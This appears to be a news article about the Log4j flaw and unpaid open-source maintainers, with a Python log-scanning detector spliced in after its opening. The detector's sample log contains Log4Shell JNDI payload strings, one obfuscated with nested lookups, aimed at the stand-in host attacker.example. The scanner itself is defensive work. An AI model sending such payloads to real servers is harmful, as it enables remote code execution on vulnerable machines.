The internet runs on free open source software. Who pays to fix it?

The vulnerability in Log4J is very easy to exploit. After sending a malicious string of characters to a vulnerable machine, hackers can run any code they want. Some of the earliest attacks involved children pasting malicious code into Minecraft servers. Hackers, including some with ties to China and Iran, are now trying to… exploit the vulnerability in any machine they can find running the flawed code.
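The paragraph above describes the attack only in outline: a crafted string reaches a log call, Log4j interprets it as a lookup, and the lookup fetches and runs remote code. The defensive counterpart is to search existing logs for such strings. The following detector is an added example written for this page, not code from the Log4j project or the article; the sample log lines and the host name `attacker.example` are constructed for illustration. It normalizes the nested-lookup and default-value tricks commonly used to disguise the string before testing for a JNDI lookup, so that both the plain and the obfuscated form are flagged while ordinary Log4j lookups (such as `${sys:...}`) are not.

```python
import re

# A lookup is dangerous when, after normalization, it resolves to a
# "jndi:<scheme>://" reference that Log4j would follow over the network.
JNDI_RE = re.compile(r"jndi:(?:ldap|ldaps|rmi|dns|iiop|corba|nds|http)://", re.IGNORECASE)

# Two common disguises inside the outer ${...}:
#   ${anything:-X}  -> X   (default-value syntax, e.g. ${::-j})
#   ${lower:X} / ${upper:X} -> X   (case-conversion lookups)
DEFAULT_RE = re.compile(r"\$\{[^${}]*?:-([^${}]*)\}")
CASE_RE = re.compile(r"\$\{(?:lower|upper):([^${}]*)\}", re.IGNORECASE)


def normalize(text: str) -> str:
    """Collapse innermost ${...} disguises until the string stops changing."""
    previous = None
    while previous != text:
        previous = text
        text = DEFAULT_RE.sub(r"\1", text)
        text = CASE_RE.sub(r"\1", text)
    return text


def is_jndi_lookup(line: str) -> bool:
    """True if the line contains a lookup that resolves to a JNDI reference."""
    return JNDI_RE.search(normalize(line)) is not None


def scan(lines):
    """Return (line_number, line) for every line that carries a JNDI lookup."""
    return [(n, line) for n, line in enumerate(lines, start=1) if is_jndi_lookup(line)]


# Constructed sample of web-server access log lines (not real traffic).
SAMPLE_LOG = [
    'GET /index.html HTTP/1.1 "Mozilla/5.0"',
    'GET /login HTTP/1.1 "${jndi:ldap://attacker.example/a}"',
    'GET /login HTTP/1.1 "${${lower:j}${::-n}di:${lower:l}dap://attacker.example/a}"',
    'GET /status HTTP/1.1 "${sys:java.version}"',   # a benign lookup, must not match
]

if __name__ == "__main__":
    for number, line in scan(SAMPLE_LOG):
        print(f"line {number}: {line}")
```

Matching lines point to hosts that received the string; the finding is only meaningful together with patching the affected Log4j installation, since the detector reports attempts, not whether they succeeded.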

And there is no clear end in sight. The Log4J problem amounts to a protracted security crisis that is expected to last for months or years. Jen Easterly, director of the US Cybersecurity and Infrastructure Security Agency, has said it is “one of the most serious flaws” she has ever seen.

For something so important, you’d expect the world’s largest tech companies and governments to contract hundreds of highly paid experts to quickly fix the flaw.

The truth is different: Long a critical part of the internet's infrastructure, Log4J was started as a volunteer project and is still run largely for free, even though many multimillion- and multibillion-dollar companies rely on it and benefit from it every day. Yazici and his team try to fix it for next to nothing.

This strange situation is routine in the world of open-source software, programs whose code anyone may inspect, modify, and use. It's a decades-old idea that has become crucial to the functioning of the Internet. When things go well, open source is a collective triumph. When they go wrong, it is a serious danger.

“Open source controls the Internet and, by extension, the economy,” said Filippo Valsorda, a developer who works on open source projects at Google. And yet, he explains, “even for core infrastructure projects, it’s very common to have a small team of administrators, or even a single maintainer who isn’t paid to work on that project.”

No recognition

“The team works around the clock,” Yazici told me by email when I first contacted him. “And my shift from 6 a.m. to 4 p.m. (no, there’s no typo in the time) just ended.”

In the midst of his long days, Yazici took the time to push back at critics, tweeting that "Log4j administrators have been working sleeplessly on mitigation measures; fixes, docs, CVE, answers to questions, etc. But nothing stops people from bashing us, for work we don't get paid for, for a feature we all don't like but must keep due to backward compatibility concerns."
